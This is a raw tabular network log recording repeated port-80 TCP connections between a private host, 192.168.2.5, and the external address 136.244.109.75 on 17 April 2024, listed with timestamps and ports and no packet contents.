Apr 17, 2024 03:17:39.349159002 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.349251032 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.349282980 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.349314928 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.363838911 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.363878012 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.363903999 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.363934994 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.378882885 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.378950119 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.379093885 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.379095078 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.393277884 CEST	80	49742	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.393413067 CEST	49742	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.614875078 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.818582058 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:39.818744898 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:39.820704937 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:40.023938894 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.024130106 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:40.227551937 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.943911076 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.943933964 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.943955898 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.943974972 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.943998098 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.944015026 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.944034100 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.944051027 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.944067955 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.944088936 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:40.944114923 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:40.944114923 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:40.944116116 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:40.944116116 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:40.944116116 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:40.944116116 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:40.944259882 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:41.081685066 CEST	49744	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:41.147377968 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:41.147403002 CEST	80	49743	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:41.147548914 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:41.147550106 CEST	49743	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:41.289504051 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:41.289715052 CEST	49744	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:41.291392088 CEST	49744	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:41.499041080 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:41.499365091 CEST	49744	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:41.707016945 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471524000 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471549034 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471566916 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471585035 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471604109 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471621990 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471642017 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471657991 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471676111 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471700907 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.471739054 CEST	49744	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:42.471817017 CEST	49744	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:42.471817017 CEST	49744	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:42.662472010 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:42.679435015 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.679457903 CEST	80	49744	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.679622889 CEST	49744	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:42.679624081 CEST	49744	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:42.870461941 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:42.870672941 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:42.872386932 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:43.080308914 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.080470085 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:43.288813114 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987329960 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987350941 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987368107 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987384081 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987399101 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987415075 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987431049 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987447023 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987462044 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987479925 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:43.987513065 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:43.987513065 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:43.987513065 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:43.987559080 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:43.987559080 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:44.133538961 CEST	49746	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:44.195703030 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:44.195734978 CEST	80	49745	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:44.195894003 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:44.195894003 CEST	49745	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:44.336771965 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:44.336961985 CEST	49746	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:44.338890076 CEST	49746	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:44.542123079 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:44.542341948 CEST	49746	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:44.745529890 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475289106 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475322962 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475341082 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475358009 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475378036 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475394011 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475410938 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475428104 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475444078 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475462914 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.475617886 CEST	49746	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:45.475617886 CEST	49746	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:45.475617886 CEST	49746	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:45.611833096 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:45.678905010 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.678931952 CEST	80	49746	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.679078102 CEST	49746	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:45.679078102 CEST	49746	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:45.815181971 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:45.815269947 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:45.817567110 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:46.020508051 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.020745039 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:46.223689079 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936615944 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936645985 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936661959 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936671972 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936692953 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936711073 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936729908 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936728001 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:46.936749935 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936769009 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936789989 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:46.936789989 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:46.936789989 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:46.936790943 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:46.936829090 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:46.936877966 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:47.078185081 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:47.139915943 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:47.139941931 CEST	80	49748	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:47.140117884 CEST	49748	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:47.286310911 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:47.286448956 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:47.288202047 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:47.496351957 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:47.496434927 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:47.706379890 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.413928986 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.413994074 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.414031982 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.414069891 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.414107084 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.414119005 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.414119005 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.414146900 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.414185047 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.414201021 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.414201021 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.414222956 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.414268017 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.414268017 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.414273977 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.414314032 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.414357901 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.414357901 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.590034962 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.623054028 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.623119116 CEST	80	49749	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.623120070 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.623238087 CEST	49749	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.800354004 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:48.800616026 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:48.803719044 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:49.012331009 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.012465000 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:49.221081972 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.947792053 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.947850943 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.947889090 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.947926998 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.947930098 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:49.947971106 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.948005915 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:49.948005915 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:49.948009968 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.948044062 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:49.948054075 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.948060036 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:49.948092937 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.948127985 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:49.948143005 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:49.948159933 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.948204041 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:49.948219061 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:49.948251009 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:50.091747046 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:50.156771898 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:50.156833887 CEST	80	49750	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:50.156953096 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:50.156953096 CEST	49750	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:50.300398111 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:50.300535917 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:50.302448988 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:50.510817051 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:50.510911942 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:50.719340086 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438206911 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438271999 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438308001 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438344955 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438384056 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438410997 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.438422918 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438462019 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438483953 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.438483953 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.438499928 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438540936 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438545942 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.438545942 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.438585043 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.438585997 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.438632011 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.586049080 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.648305893 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.648365021 CEST	80	49751	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.648379087 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.648441076 CEST	49751	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.795279980 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:51.795392990 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:51.797146082 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:52.005323887 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:52.005431890 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:52.214188099 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.016751051 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.016868114 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.016906023 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.016946077 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.016988993 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.017013073 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.017014027 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.017014027 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.017029047 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.017035961 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.017071962 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.017112017 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.017152071 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.017190933 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.017198086 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.017199039 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.017199039 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.017199039 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.017235994 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.163472891 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.227627993 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.227680922 CEST	80	49752	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.227696896 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.227741003 CEST	49752	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.370764971 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.371001959 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.372678995 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.579653978 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:53.579726934 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:53.786837101 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562074900 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562139988 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562231064 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562268972 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562309980 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562346935 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562386036 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562423944 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562449932 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.562449932 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.562449932 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.562449932 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.562449932 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.562449932 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.562464952 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562488079 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.562509060 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.562510014 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.562670946 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.761008978 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.770065069 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.770131111 CEST	80	49753	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.770133018 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.770175934 CEST	49753	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.965198040 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:54.965400934 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:54.967221022 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:55.170995951 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:55.171137094 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:55.374860048 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.088845015 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.088908911 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.088946104 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.088982105 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.089024067 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.089061022 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.089098930 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.089111090 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.089111090 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.089111090 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.089112043 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.089112043 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.089139938 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.089178085 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.089205027 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.089205980 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.089221954 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.089230061 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.089272976 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.218398094 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.293294907 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.293328047 CEST	80	49754	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.293495893 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.293497086 CEST	49754	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.421550035 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.421770096 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.686681986 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:56.889904022 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:56.889962912 CEST	49755	80	192.168.2.5	136.244.109.75
Apr 17, 2024 03:17:57.092870951 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:57.797519922 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:57.797590017 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:57.797631979 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:57.797671080 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:57.797712088 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:57.797749043 CEST	80	49755	136.244.109.75	192.168.2.5
Apr 17, 2024 03:17:57.797787905 CEST	80	49755	136.244.109.75	192.168.2.5
